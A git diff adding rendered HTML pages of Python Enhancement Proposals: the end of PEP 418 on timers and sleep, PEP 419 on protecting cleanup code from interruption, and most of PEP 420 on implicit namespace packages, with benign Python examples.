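    ts = timespec(int(deadline), int((deadline - int(deadline)) * 1e9))
    err = librt.clock_nanosleep(CLOCK_MONOTONIC, TIMER_ABSTIME,
                                ctypes.byref(ts), None)
    if err:  # returns an error number directly, not -1 with errno
        raise OSError(err, "clock_nanosleep failed")

sleep_until(time.clock_gettime(time.CLOCK_MONOTONIC) + 0.5)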

+
+
+

select()

+

select(nfds, readfds, writefds, exceptfds, timeout).

+

Since Linux 2.6.28, select() uses high-resolution timers to handle the timeout. A process has a “slack” attribute to configure the precision of the timeout; the default slack is 50 microseconds. Before Linux 2.6.28, timeouts for select() were handled by the main timing subsystem at a jiffy-level resolution. See also High- (but not too high-) resolution timeouts and Timer slack.
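A minimal sketch of a timeout wait from Python:

import select
import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

# Wait at most 10 ms for the socket to become readable; an empty
# list means the timeout expired (subject to the timer slack above).
readable, _, _ = select.select([sock], [], [], 0.010)
print(bool(readable))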

+
+
+

Other functions

+
    +
  • poll(), epoll()
  • +
  • sigtimedwait(). POSIX: “If the Monotonic Clock option is supported, +the CLOCK_MONOTONIC clock shall be used to measure the time +interval specified by the timeout argument.”
  • +
  • pthread_cond_timedwait(), pthread_condattr_setclock(). “The default +value of the clock attribute shall refer to the system time.”
  • +
  • sem_timedwait(): “If the Timers option is supported, the timeout +shall be based on the CLOCK_REALTIME clock. If the Timers option is +not supported, the timeout shall be based on the system time as +returned by the time() function. The precision of the timeout +shall be the precision of the clock on which it is based.”
  • +
  • WaitForSingleObject(): uses the same timer as GetTickCount(), with the same precision.
  • +
+
+
+
+
+

System Standby

+

The ACPI power state “S3” is a system standby mode, also called +“Suspend to RAM”. RAM remains powered.

+

On Windows, the WM_POWERBROADCAST message is sent to Windows applications to notify them of power-management events (e.g., the power status has changed).

+

For Mac OS X, read Registering and unregistering for sleep and wake +notifications +(Technical Q&A QA1340).

+
+
+

Footnotes

+ +
+ +
+

Acceptance

+

The PEP was accepted on 2012-04-28 by Guido van Rossum [1]. The PEP +implementation has since been committed to the repository.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0418.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0419/index.html b/pep-0419/index.html new file mode 100644 index 00000000000..98ea5b02e3d --- /dev/null +++ b/pep-0419/index.html @@ -0,0 +1,635 @@ + + + + + + + + PEP 419 – Protecting cleanup statements from interruptions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 419 – Protecting cleanup statements from interruptions

+
+
Author:
+
Paul Colomiets <paul at colomiets.name>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
06-Apr-2012
+
Python-Version:
+
3.3
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a way to protect Python code from being interrupted +inside a finally clause or during context manager cleanup.

+
+
+

PEP Deferral

+

Further exploration of the concepts covered in this PEP has been deferred +for lack of a current champion interested in promoting the goals of the PEP +and collecting and incorporating feedback, and with sufficient available +time to do so effectively.

+
+
+

Rationale

+

Python has two nice ways to do cleanup. One is a finally +statement and the other is a context manager (usually called using a +with statement). However, neither is protected from interruption +by KeyboardInterrupt or GeneratorExit caused by +generator.throw(). For example:

+
lock.acquire()
+try:
+    print('starting')
+    do_something()
+finally:
+    print('finished')
+    lock.release()
+
+
+

If KeyboardInterrupt occurs just after the second print() +call, the lock will not be released. Similarly, the following code +using the with statement is affected:

+
from threading import Lock
+
+class MyLock:
+
+    def __init__(self):
+        self._lock_impl = Lock()
+
+    def __enter__(self):
+        self._lock_impl.acquire()
+        print("LOCKED")
+
+    def __exit__(self, exc_type, exc_value, traceback):
+        print("UNLOCKING")
+        self._lock_impl.release()
+
+lock = MyLock()
+with lock:
+    do_something()
+
+
+

If KeyboardInterrupt occurs near any of the print() calls, the +lock will never be released.

+
+

Coroutine Use Case

+

A similar case occurs with coroutines. Usually coroutine libraries +want to interrupt the coroutine with a timeout. The +generator.throw() method works for this use case, but there is no +way of knowing if the coroutine is currently suspended from inside a +finally clause.

+

An example that uses yield-based coroutines follows. The code looks +similar using any of the popular coroutine libraries Monocle [1], +Bluelet [2], or Twisted [3].

+
def run_locked():
+    yield connection.sendall('LOCK')
+    try:
+        yield do_something()
+        yield do_something_else()
+    finally:
+        yield connection.sendall('UNLOCK')
+
+with timeout(5):
+    yield run_locked()
+
+
+

In the example above, yield something means to pause executing the +current coroutine and to execute coroutine something until it +finishes execution. Therefore, the coroutine library itself needs to +maintain a stack of generators. The connection.sendall() call waits +until the socket is writable and does a similar thing to what +socket.sendall() does.

+

The with statement ensures that all code is executed within a 5-second timeout. It does so by registering a callback in the main loop, which calls generator.throw() on the top-most frame in the coroutine stack when a timeout happens.

+

The greenlets extension works in a similar way, except that it doesn’t need yield to enter a new stack frame. Otherwise, the considerations are similar.

+
+
+
+

Specification

+
+

Frame Flag ‘f_in_cleanup’

+

A new flag on the frame object is proposed. It is set to True if +this frame is currently executing a finally clause. Internally, +the flag must be implemented as a counter of nested finally statements +currently being executed.

+

The internal counter also needs to be incremented during execution of the SETUP_WITH and WITH_CLEANUP bytecodes, and decremented when execution of these bytecodes is finished. This also allows protecting the __enter__() and __exit__() methods.

+
+
+

Function ‘sys.setcleanuphook’

+

A new function for the sys module is proposed. This function sets +a callback which is executed every time f_in_cleanup becomes +false. Callbacks get a frame object as their sole argument, so that +they can figure out where they are called from.

+

The setting is thread local and must be stored in the +PyThreadState structure.

+
+
+

Inspect Module Enhancements

+

Two new functions are proposed for the inspect module: +isframeincleanup() and getcleanupframe().

+

isframeincleanup(), given a frame or generator object as its sole argument, returns the value of the f_in_cleanup attribute of the frame itself, or of the frame referenced by a generator’s gi_frame attribute.

+

getcleanupframe(), given a frame object as its sole argument, +returns the innermost frame which has a true value of +f_in_cleanup, or None if no frames in the stack have a nonzero +value for that attribute. It starts to inspect from the specified +frame and walks to outer frames using f_back pointers, just like +getouterframes() does.

+
+
+
+

Example

+

An example implementation of a SIGINT handler that interrupts safely +might look like:

+
import inspect, sys, functools
+
+def sigint_handler(sig, frame):
+    if inspect.getcleanupframe(frame) is None:
+        raise KeyboardInterrupt()
+    sys.setcleanuphook(functools.partial(sigint_handler, 0))
+
+
+

A coroutine example is out of scope of this document, because its implementation depends very much on the trampoline (or main loop) used by the coroutine library.

+
+
+

Unresolved Issues

+
+

Interruption Inside With Statement Expression

+

Given the statement

+
with open(filename):
+    do_something()
+
+
+

Python can be interrupted after open() is called, but before the +SETUP_WITH bytecode is executed. There are two possible +decisions:

+
    +
  • Protect with expressions. This would require another bytecode, +since currently there is no way of recognizing the start of the +with expression.
  • +
  • Let the user write a wrapper if they consider it important for the use case. A safe wrapper might look like this:
    class FileWrapper(object):
    +
    +    def __init__(self, filename, mode):
    +        self.filename = filename
    +        self.mode = mode
    +
    +    def __enter__(self):
    +        self.file = open(self.filename, self.mode)
    +
+    def __exit__(self, exc_type, exc_value, traceback):
    +        self.file.close()
    +
    +
    +

    Alternatively it can be written using the contextmanager() +decorator:

    +
    @contextmanager
    +def open_wrapper(filename, mode):
    +    file = open(filename, mode)
    +    try:
    +        yield file
    +    finally:
    +        file.close()
    +
    +
    +

    This code is safe, as the first part of the generator (before yield) +is executed inside the SETUP_WITH bytecode of the caller.

    +
  • +
+
+
+

Exception Propagation

+

Sometimes a finally clause or an __enter__()/__exit__() +method can raise an exception. Usually this is not a problem, since +more important exceptions like KeyboardInterrupt or SystemExit +should be raised instead. But it may be nice to be able to keep the +original exception inside a __context__ attribute. So the cleanup +hook signature may grow an exception argument:

+
+def sigint_handler(sig, frame):
+    if inspect.getcleanupframe(frame) is None:
+        raise KeyboardInterrupt()
+    sys.setcleanuphook(retry_sigint)
+
+def retry_sigint(frame, exception=None):
+    if inspect.getcleanupframe(frame) is None:
+        raise KeyboardInterrupt() from exception
+
+
+
+

Note

+

There is no need to have three arguments as in the __exit__ method, since exceptions have a __traceback__ attribute in Python 3.

+
+

However, this will set the __cause__ for the exception, which is +not exactly what’s intended. So some hidden interpreter logic may be +used to put a __context__ attribute on every exception raised in a +cleanup hook.

+
+
+

Interruption Between Acquiring Resource and Try Block

+

The example from the first section is not totally safe. Let’s take a +closer look:

+
lock.acquire()
+try:
+    do_something()
+finally:
+    lock.release()
+
+
+

The problem might occur if the code is interrupted just after +lock.acquire() is executed but before the try block is +entered.

+

There is no way to fix the code without modifying it. The actual fix depends very much on the use case. Usually the code can be fixed using a with statement:

+
with lock:
+    do_something()
+
+
+

However, for coroutines one usually can’t use the with statement because one needs to yield for both the acquire and release operations. So the code might be rewritten like this:

+
try:
+    yield lock.acquire()
+    do_something()
+finally:
+    yield lock.release()
+
+
+

The actual locking code might need more support for this use case, but the implementation is usually trivial: check whether the lock has been acquired, and unlock it if it has.

+
+
+

Handling EINTR Inside a Finally

+

Even if a signal handler is prepared to check the f_in_cleanup +flag, InterruptedError might be raised in the cleanup handler, +because the respective system call returned an EINTR error. The +primary use cases are prepared to handle this:

+
    +
  • POSIX mutexes never return EINTR
  • +
  • Networking libraries are always prepared to handle EINTR
  • +
  • Coroutine libraries are usually interrupted with the throw() +method, not with a signal
  • +
+

The platform-specific function siginterrupt() might be used to remove the need to handle EINTR. However, it may have hardly predictable consequences; for example, a SIGINT handler is never called if the main thread is stuck inside an I/O routine.

+

A better approach would be to have the code, which is usually used in +cleanup handlers, be prepared to handle InterruptedError +explicitly. An example of such code might be a file-based lock +implementation.

+

signal.pthread_sigmask can be used to block signals inside +cleanup handlers which can be interrupted with EINTR.
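A minimal sketch of that approach (the cleanup callable is a hypothetical placeholder):

import signal

def interruption_safe_cleanup(cleanup):
    # Block SIGINT so the cleanup's system calls cannot fail with
    # EINTR, then restore the previous signal mask.
    old_mask = signal.pthread_sigmask(signal.SIG_BLOCK, {signal.SIGINT})
    try:
        cleanup()  # hypothetical cleanup callable doing I/O
    finally:
        signal.pthread_sigmask(signal.SIG_SETMASK, old_mask)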

+
+
+

Setting Interruption Context Inside Finally Itself

+

Some coroutine libraries may need to set a timeout for the finally +clause itself. For example:

+
try:
+    do_something()
+finally:
+    with timeout(0.5):
+        try:
+            yield do_slow_cleanup()
+        finally:
+            yield do_fast_cleanup()
+
+
+

With current semantics, timeout will either protect the whole with +block or nothing at all, depending on the implementation of each +library. What the author intended is to treat do_slow_cleanup as +ordinary code, and do_fast_cleanup as a cleanup (a +non-interruptible one).

+

A similar case might occur when using greenlets or tasklets.

+

This case can be fixed by exposing f_in_cleanup as a counter, and +by calling a cleanup hook on each decrement. A coroutine library may +then remember the value at timeout start, and compare it on each hook +execution.

+

But in practice, the example is considered to be too obscure to take +into account.

+
+
+

Modifying KeyboardInterrupt

+

It should be decided whether the default SIGINT handler should be modified to use the described mechanism. The initial proposition is to keep the old behavior, for two reasons:

+
    +
  • Most applications do not care about cleanup on exit (either they do not have external state, or they modify it in a crash-safe way).
  • +
  • Cleanup may take too much time, not giving the user a chance to interrupt the application.
  • +
+

The latter case can be fixed by allowing an unsafe break if the SIGINT handler is called twice, but it does not seem worth the complexity.

+
+
+
+

Alternative Python Implementations Support

+

We consider f_in_cleanup an implementation detail. The actual implementation may have some fake frame-like object passed to the signal handler and cleanup hook and returned from getcleanupframe(). The only requirement is that the inspect module functions work as expected on these objects. For this reason, we also allow passing a generator object to the isframeincleanup() function, which removes the need to use the gi_frame attribute.

+

It might be necessary to specify that getcleanupframe() must return the same object that will be passed to the cleanup hook at its next invocation.

+
+
+

Alternative Names

+

The original proposal had an f_in_finally frame attribute, as the original intention was to protect finally clauses. But as the mechanism grew to protect the __enter__ and __exit__ methods too, the f_in_cleanup name seems better. Although the __enter__ method is not a cleanup routine, it at least relates to cleanup done by context managers.

+

setcleanuphook, isframeincleanup and getcleanupframe could be written less obscurely as set_cleanup_hook, is_frame_in_cleanup and get_cleanup_frame, although the current names follow the naming conventions of their respective modules.

+
+
+

Alternative Proposals

+
+

Propagating ‘f_in_cleanup’ Flag Automatically

+

This can make getcleanupframe() unnecessary. But for yield-based coroutines the flag must be propagated manually. Making it writable leads to somewhat unpredictable behavior of setcleanuphook().

+
+
+

Add Bytecodes ‘INCR_CLEANUP’, ‘DECR_CLEANUP’

+

These bytecodes can be used to protect the expression inside the +with statement, as well as making counter increments more explicit +and easy to debug (visible inside a disassembly). Some middle ground +might be chosen, like END_FINALLY and SETUP_WITH implicitly +decrementing the counter (END_FINALLY is present at end of every +with suite).

+

However, adding new bytecodes must be considered very carefully.

+
+
+

Expose ‘f_in_cleanup’ as a Counter

+

The original intention was to expose a minimum of needed +functionality. However, as we consider the frame flag +f_in_cleanup an implementation detail, we may expose it as a +counter.

+

Similarly, if we have a counter we may need to have the cleanup hook +called on every counter decrement. It’s unlikely to have much +performance impact as nested finally clauses are an uncommon case.

+
+
+

Add code object flag ‘CO_CLEANUP’

+

As an alternative to setting the flag inside the SETUP_WITH and WITH_CLEANUP bytecodes, we can introduce a flag CO_CLEANUP. When the interpreter starts to execute code with CO_CLEANUP set, it sets f_in_cleanup for the whole function body. This flag is set for the code objects of the __enter__ and __exit__ special methods. Technically, it might be set on any function named __enter__ or __exit__.

+

This seems to be a less clear solution. It also covers the case where __enter__ and __exit__ are called manually. This may be accepted either as a feature or as an unnecessary side effect (or, though unlikely, as a bug).

+

It may also pose a problem when the __enter__ or __exit__ functions are implemented in C, as there is no code object on which the CO_CLEANUP flag could be set.

+
+
+

Have Cleanup Callback on Frame Object Itself

+

The frame object may be extended to have a f_cleanup_callback +member which is called when f_in_cleanup is reset to 0. This +would help to register different callbacks to different coroutines.

+

Despite its apparent beauty, this solution doesn’t add anything, as +the two primary use cases are:

+
    +
  • Setting the callback in a signal handler. The callback is +inherently a single one for this case.
  • +
  • Use a single callback per loop for the coroutine use case. Here, in +almost all cases, there is only one loop per thread.
  • +
+
+
+

No Cleanup Hook

+

The original proposal included no cleanup hook specification, as there +are a few ways to achieve the same using current tools:

+
    +
  • Using sys.settrace() and the f_trace callback. This may interfere with debugging and has a big performance impact (although interruption doesn’t happen very often).
  • +
  • Sleeping a bit more and trying again. For a coroutine library this is easy. For signals it may be achieved using signal.alarm.
  • +
+

Both methods are considered too impractical, so a way to catch the exit from finally clauses is proposed instead.

+
+
+
+

References

+ +

[4] Original discussion + https://mail.python.org/pipermail/python-ideas/2012-April/014705.html

+

[5] Implementation of PEP 419 + https://github.com/python/cpython/issues/58935

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0419.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0420/index.html b/pep-0420/index.html new file mode 100644 index 00000000000..b20d52a6624 --- /dev/null +++ b/pep-0420/index.html @@ -0,0 +1,739 @@ + + + + + + + + PEP 420 – Implicit Namespace Packages | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 420 – Implicit Namespace Packages

+
+
Author:
+
Eric V. Smith <eric at trueblade.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
19-Apr-2012
+
Python-Version:
+
3.3
+
Post-History:
+

+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Namespace packages are a mechanism for splitting a single Python package across multiple directories on disk. In current Python versions, an algorithm to compute the package’s __path__ must be formulated. With the enhancement proposed here, the import machinery itself will construct the list of directories that make up the package. This PEP builds upon previous work, documented in PEP 382 and PEP 402. Those PEPs have since been rejected in favor of this one. An implementation of this PEP is at [1].

+
+
+

Terminology

+

Within this PEP:

+
    +
  • “package” refers to Python packages as defined by Python’s import +statement.
  • +
  • “distribution” refers to separately installable sets of Python +modules as stored in the Python package index, and installed by +distutils or setuptools.
  • +
  • “vendor package” refers to groups of files installed by an +operating system’s packaging mechanism (e.g. Debian or Redhat +packages install on Linux systems).
  • +
  • “regular package” refers to packages as they are implemented in +Python 3.2 and earlier.
  • +
  • “portion” refers to a set of files in a single directory (possibly +stored in a zip file) that contribute to a namespace package.
  • +
  • “legacy portion” refers to a portion that uses __path__ +manipulation in order to implement namespace packages.
  • +
+

This PEP defines a new type of package, the “namespace package”.

+
+
+

Namespace packages today

+

Python currently provides pkgutil.extend_path to denote a package +as a namespace package. The recommended way of using it is to put:

+
from pkgutil import extend_path
+__path__ = extend_path(__path__, __name__)
+
+
+

in the package’s __init__.py. Every distribution needs to provide +the same contents in its __init__.py, so that extend_path is +invoked independent of which portion of the package gets imported +first. As a consequence, the package’s __init__.py cannot +practically define any names as it depends on the order of the package +fragments on sys.path to determine which portion is imported +first. As a special feature, extend_path reads files named +<packagename>.pkg which allows declaration of additional portions.

+

setuptools provides a similar function named +pkg_resources.declare_namespace that is used in the form:

+
import pkg_resources
+pkg_resources.declare_namespace(__name__)
+
+
+

In the portion’s __init__.py, no assignment to __path__ is +necessary, as declare_namespace modifies the package __path__ +through sys.modules. As a special feature, declare_namespace +also supports zip files, and registers the package name internally so +that future additions to sys.path by setuptools can properly add +additional portions to each package.

+

setuptools allows declaring namespace packages in a distribution’s +setup.py, so that distribution developers don’t need to put the +magic __path__ modification into __init__.py themselves.

+

See PEP 402’s “The Problem” +section for additional motivations +for namespace packages. Note that PEP 402 has been rejected, but the +motivating use cases are still valid.

+
+
+

Rationale

+

The current imperative approach to namespace packages has led to +multiple slightly-incompatible mechanisms for providing namespace +packages. For example, pkgutil supports *.pkg files; setuptools +doesn’t. Likewise, setuptools supports inspecting zip files, and +supports adding portions to its _namespace_packages variable, +whereas pkgutil doesn’t.

+

Namespace packages are designed to support being split across multiple +directories (and hence found via multiple sys.path entries). In +this configuration, it doesn’t matter if multiple portions all provide +an __init__.py file, so long as each portion correctly initializes +the namespace package. However, Linux distribution vendors (amongst +others) prefer to combine the separate portions and install them all +into the same file system directory. This creates a potential for +conflict, as the portions are now attempting to provide the same +file on the target system - something that is not allowed by many +package managers. Allowing implicit namespace packages means that the +requirement to provide an __init__.py file can be dropped +completely, and affected portions can be installed into a common +directory or split across multiple directories as distributions see +fit.

+

A namespace package will not be constrained by a fixed __path__, +computed from the parent path at namespace package creation time. +Consider the standard library encodings package:

+
    +
  1. Suppose that encodings becomes a namespace package.
  2. +
  3. It sometimes gets imported during interpreter startup to +initialize the standard io streams.
  4. +
  5. An application modifies sys.path after startup and wants to +contribute additional encodings from new path entries.
  6. +
  7. An attempt is made to import an encoding from an encodings +portion that is found on a path entry added in step 3.
  8. +
+

If the import system was restricted to only finding portions along the +value of sys.path that existed at the time the encodings +namespace package was created, the additional paths added in step 3 +would never be searched for the additional portions imported in step +4. In addition, if step 2 were sometimes skipped (due to some runtime +flag or other condition), then the path items added in step 3 would +indeed be used the first time a portion was imported. Thus this PEP +requires that the list of path entries be dynamically computed when +each portion is loaded. It is expected that the import machinery will +do this efficiently by caching __path__ values and only refreshing +them when it detects that the parent path has changed. In the case of +a top-level package like encodings, this parent path would be +sys.path.

+
+
+

Specification

+

Regular packages will continue to have an __init__.py and will +reside in a single directory.

+

Namespace packages cannot contain an __init__.py. As a +consequence, pkgutil.extend_path and +pkg_resources.declare_namespace become obsolete for purposes of +namespace package creation. There will be no marker file or directory +for specifying a namespace package.

+

During import processing, the import machinery will continue to +iterate over each directory in the parent path as it does in Python +3.2. While looking for a module or package named “foo”, for each +directory in the parent path:

+
    +
  • If <directory>/foo/__init__.py is found, a regular package is +imported and returned.
  • +
  • If not, but <directory>/foo.{py,pyc,so,pyd} is found, a module is imported and returned. The exact list of extensions varies by platform and whether the -O flag is specified. The list here is representative.
  • +
  • If not, but <directory>/foo is found and is a directory, it is +recorded and the scan continues with the next directory in the +parent path.
  • +
  • Otherwise the scan continues with the next directory in the parent +path.
  • +
+

If the scan completes without returning a module or package, and at +least one directory was recorded, then a namespace package is created. +The new namespace package:

+
    +
  • Has a __path__ attribute set to an iterable of the path strings +that were found and recorded during the scan.
  • +
  • Does not have a __file__ attribute.
  • +
+

Note that if “import foo” is executed and “foo” is found as a +namespace package (using the above rules), then “foo” is immediately +created as a package. The creation of the namespace package is not +deferred until a sub-level import occurs.
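The scan described above can be modeled in a few lines of Python. This is an illustrative sketch only, not the actual import machinery:

import os

def scan_parent_path(parent_path, name):
    # First regular package or module found wins; otherwise plain
    # directories are collected as namespace-package portions.
    portions = []
    for entry in parent_path:
        candidate = os.path.join(entry, name)
        if os.path.isfile(os.path.join(candidate, "__init__.py")):
            return "regular package", candidate
        for ext in (".py", ".pyc", ".so", ".pyd"):  # representative
            if os.path.isfile(candidate + ext):
                return "module", candidate + ext
        if os.path.isdir(candidate):
            portions.append(candidate)
    if portions:
        return "namespace package", portions
    raise ImportError("No module named {!r}".format(name))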

+

A namespace package is not fundamentally different from a regular +package. It is just a different way of creating packages. Once a +namespace package is created, there is no functional difference +between it and a regular package.

+
+

Dynamic path computation

+

The import machinery will behave as if a namespace package’s +__path__ is recomputed before each portion is loaded.

+

For performance reasons, it is expected that this will be achieved by +detecting that the parent path has changed. If no change has taken +place, then no __path__ recomputation is required. The +implementation must ensure that changes to the contents of the parent +path are detected, as well as detecting the replacement of the parent +path with a new path entry list object.

+
+
+

Impact on import finders and loaders

+

PEP 302 defines “finders” that are called to search path elements. +These finders’ find_module methods return either a “loader” object +or None.

+

For a finder to contribute to namespace packages, it must implement a +new find_loader(fullname) method. fullname has the same +meaning as for find_module. find_loader always returns a +2-tuple of (loader, <iterable-of-path-entries>). loader may +be None, in which case <iterable-of-path-entries> (which may +be empty) is added to the list of recorded path entries and path +searching continues. If loader is not None, it is immediately +used to load a module or regular package.

+

Even if loader is returned and is not None, +<iterable-of-path-entries> must still contain the path entries for +the package. This allows code such as pkgutil.extend_path() to +compute path entries for packages that it does not load.

+

Note that multiple path entries per finder are allowed. This is to +support the case where a finder discovers multiple namespace portions +for a given fullname. Many finders will support only a single +namespace package portion per find_loader call, in which case this +iterable will contain only a single string.

+

The import machinery will call find_loader if it exists, else fall +back to find_module. Legacy finders which implement +find_module but not find_loader will be unable to contribute +portions to a namespace package.
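For illustration, a sketch of a path-entry finder implementing the new method; the portion-discovery logic here is a simplified stand-in, not part of the specification:

import os

class ExampleFinder:
    """Illustrative path-entry finder using the new find_loader()."""

    def __init__(self, path_entry):
        self.path_entry = path_entry

    def _find_portion(self, fullname):
        # Hypothetical helper: a plain directory matching the module
        # name counts as a namespace-package portion.
        name = fullname.rpartition('.')[2]
        candidate = os.path.join(self.path_entry, name)
        return candidate if os.path.isdir(candidate) else None

    def find_loader(self, fullname):
        # Returning (None, [portion]) contributes a namespace portion
        # and lets the search continue; returning a real loader would
        # end the search immediately.
        portion = self._find_portion(fullname)
        if portion is not None:
            return None, [portion]
        return None, []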

+

The specification expands PEP 302 loaders to include an optional method called module_repr() which, if present, is used to generate module object reprs. See the section below for further details.

+
+
+

Differences between namespace packages and regular packages

+

Namespace packages and regular packages are very similar. The +differences are:

+
    +
  • Portions of namespace packages need not all come from the same +directory structure, or even from the same loader. Regular packages +are self-contained: all parts live in the same directory hierarchy.
  • +
  • Namespace packages have no __file__ attribute.
  • +
  • Namespace packages’ __path__ attribute is a read-only iterable +of strings, which is automatically updated when the parent path is +modified.
  • +
  • Namespace packages have no __init__.py module.
  • +
  • Namespace packages have a different type of object for their +__loader__ attribute.
  • +
+
+
+

Namespace packages in the standard library

+

It is possible, and this PEP explicitly allows, that parts of the +standard library be implemented as namespace packages. When and if +any standard library packages become namespace packages is outside the +scope of this PEP.

+
+
+

Migrating from legacy namespace packages

+

As described above, prior to this PEP pkgutil.extend_path() was +used by legacy portions to create namespace packages. Because it is +likely not practical for all existing portions of a namespace package +to be migrated to this PEP at once, extend_path() will be modified +to also recognize PEP 420 namespace packages. This will allow some +portions of a namespace to be legacy portions while others are +migrated to PEP 420. These hybrid namespace packages will not have +the dynamic path computation that normal namespace packages have, +since extend_path() never provided this functionality in the past.

+
+
+
+

Packaging Implications

+

Multiple portions of a namespace package can be installed into the +same directory, or into separate directories. For this section, +suppose there are two portions which define “foo.bar” and “foo.baz”. +“foo” itself is a namespace package.

+

If these are installed in the same location, a single directory “foo” +would be in a directory that is on sys.path. Inside “foo” would +be two directories, “bar” and “baz”. If “foo.bar” is removed (perhaps +by an OS package manager), care must be taken not to remove the +“foo/baz” or “foo” directories. Note that in this case “foo” will be +a namespace package (because it lacks an __init__.py), even though +all of its portions are in the same directory.

+

Note that “foo.bar” and “foo.baz” can be installed into the same “foo” +directory because they will not have any files in common.

+

If the portions are installed in different locations, two different +“foo” directories would be in directories that are on sys.path. +“foo/bar” would be in one of these sys.path entries, and “foo/baz” +would be in the other. Upon removal of “foo.bar”, the “foo/bar” and +corresponding “foo” directories can be completely removed. But +“foo/baz” and its corresponding “foo” directory cannot be removed.

+

It is also possible to have the “foo.bar” portion installed in a +directory on sys.path, and have the “foo.baz” portion provided in +a zip file, also on sys.path.

+
+
+

Examples

+
+

Nested namespace packages

+

This example uses the following directory structure:

+
Lib/test/namespace_pkgs
+    project1
+        parent
+            child
+                one.py
+    project2
+        parent
+            child
+                two.py
+
+
+

Here, both parent and child are namespace packages: Portions of them +exist in different directories, and they do not have __init__.py +files.

+

Here we add the parent directories to sys.path, and show that the +portions are correctly found:

+
>>> import sys
+>>> sys.path += ['Lib/test/namespace_pkgs/project1', 'Lib/test/namespace_pkgs/project2']
+>>> import parent.child.one
+>>> parent.__path__
+_NamespacePath(['Lib/test/namespace_pkgs/project1/parent', 'Lib/test/namespace_pkgs/project2/parent'])
+>>> parent.child.__path__
+_NamespacePath(['Lib/test/namespace_pkgs/project1/parent/child', 'Lib/test/namespace_pkgs/project2/parent/child'])
+>>> import parent.child.two
+>>>
+
+
+
+
+

Dynamic path computation

+

This example uses a similar directory structure, but adds a third +portion:

+
Lib/test/namespace_pkgs
+    project1
+        parent
+            child
+                one.py
+    project2
+        parent
+            child
+                two.py
+    project3
+        parent
+            child
+                three.py
+
+
+

We add project1 and project2 to sys.path, then import +parent.child.one and parent.child.two. Then we add the +project3 to sys.path and when parent.child.three is +imported, project3/parent is automatically added to +parent.__path__:

+
# add the first two parent paths to sys.path
+>>> import sys
+>>> sys.path += ['Lib/test/namespace_pkgs/project1', 'Lib/test/namespace_pkgs/project2']
+
+# parent.child.one can be imported, because project1 was added to sys.path:
+>>> import parent.child.one
+>>> parent.__path__
+_NamespacePath(['Lib/test/namespace_pkgs/project1/parent', 'Lib/test/namespace_pkgs/project2/parent'])
+
+# parent.child.__path__ contains project1/parent/child and project2/parent/child, but not project3/parent/child:
+>>> parent.child.__path__
+_NamespacePath(['Lib/test/namespace_pkgs/project1/parent/child', 'Lib/test/namespace_pkgs/project2/parent/child'])
+
+# parent.child.two can be imported, because project2 was added to sys.path:
+>>> import parent.child.two
+
+# we cannot import parent.child.three, because project3 is not in the path:
+>>> import parent.child.three
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+  File "<frozen importlib._bootstrap>", line 1286, in _find_and_load
+  File "<frozen importlib._bootstrap>", line 1250, in _find_and_load_unlocked
+ImportError: No module named 'parent.child.three'
+
+# now add project3 to sys.path:
+>>> sys.path.append('Lib/test/namespace_pkgs/project3')
+
+# and now parent.child.three can be imported:
+>>> import parent.child.three
+
+# project3/parent has been added to parent.__path__:
+>>> parent.__path__
+_NamespacePath(['Lib/test/namespace_pkgs/project1/parent', 'Lib/test/namespace_pkgs/project2/parent', 'Lib/test/namespace_pkgs/project3/parent'])
+
+# and project3/parent/child has been added to parent.child.__path__
+>>> parent.child.__path__
+_NamespacePath(['Lib/test/namespace_pkgs/project1/parent/child', 'Lib/test/namespace_pkgs/project2/parent/child', 'Lib/test/namespace_pkgs/project3/parent/child'])
+>>>
+
+
+
+
+
+

Discussion

+

At PyCon 2012, we had a discussion about namespace packages at which +PEP 382 and PEP 402 were rejected, to be replaced by this PEP [3].

+

There is no intention to remove support of regular packages. If a +developer knows that her package will never be a portion of a +namespace package, then there is a performance advantage to it being a +regular package (with an __init__.py). Creation and loading of a +regular package can take place immediately when it is located along +the path. With namespace packages, all entries in the path must be +scanned before the package is created.

+

Note that an ImportWarning will no longer be raised for a directory +lacking an __init__.py file. Such a directory will now be +imported as a namespace package, whereas in prior Python versions an +ImportWarning would be raised.

+

Alyssa (Nick) Coghlan presented a list of her objections to this proposal [4]. +They are:

+
    +
  1. Implicit package directories go against the Zen of Python.
  2. +
  3. Implicit package directories pose awkward backwards compatibility +challenges.
  4. +
  5. Implicit package directories introduce ambiguity into file system +layouts.
  6. +
  7. Implicit package directories will permanently entrench current +newbie-hostile behavior in __main__.
  8. +
+

Alyssa later gave a detailed response to her own objections [5], which +is summarized here:

+
    +
  1. The practicality of this PEP wins over other proposals and the +status quo.
  2. +
  3. Minor backward compatibility issues are okay, as long as they are +properly documented.
  4. +
  5. This will be addressed in PEP 395.
  6. +
  7. This will also be addressed in PEP 395.
  8. +
+

The inclusion of namespace packages in the standard library was +motivated by Martin v. Löwis, who wanted the encodings package to +become a namespace package [6]. While this PEP allows for standard +library packages to become namespaces, it defers a decision on +encodings.

+
+

find_module versus find_loader

+

An early draft of this PEP specified a change to the find_module +method in order to support namespace packages. It would be modified +to return a string in the case where a namespace package portion was +discovered.

+

However, this caused a problem with existing code outside of the +standard library which calls find_module. Because this code would +not be upgraded in concert with changes required by this PEP, it would +fail when it would receive unexpected return values from +find_module. Because of this incompatibility, this PEP now +specifies that finders that want to provide namespace portions must +implement the find_loader method, described above.

+

The use case for supporting multiple portions per find_loader call +is given in [7].

+
